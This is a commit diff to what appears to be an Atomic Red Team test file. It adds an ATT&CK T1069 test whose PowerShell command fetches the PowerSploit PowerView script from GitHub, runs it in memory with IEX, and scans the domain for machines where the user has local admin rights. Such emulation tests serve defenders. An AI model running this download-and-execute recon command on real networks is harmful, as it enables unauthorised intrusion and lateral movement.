T1069 - Find machines where user has local admin access (PowerView) (#1001)
* write test * link to specific commit of file
This commit is contained in:
@@ -75,3 +75,16 @@ atomic_tests:
|
||||
net groups "Account Operators" /doma
|
||||
net groups "Exchange Organization Management" /doma
|
||||
net group "BUILTIN\Backup Operators" /doma
|
||||
|
||||
- name: Find machines where user has local admin access (PowerView)
|
||||
description: |
|
||||
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-LocalAdminAccess -Verbose
|
||||
|
||||
Reference in New Issue
Block a user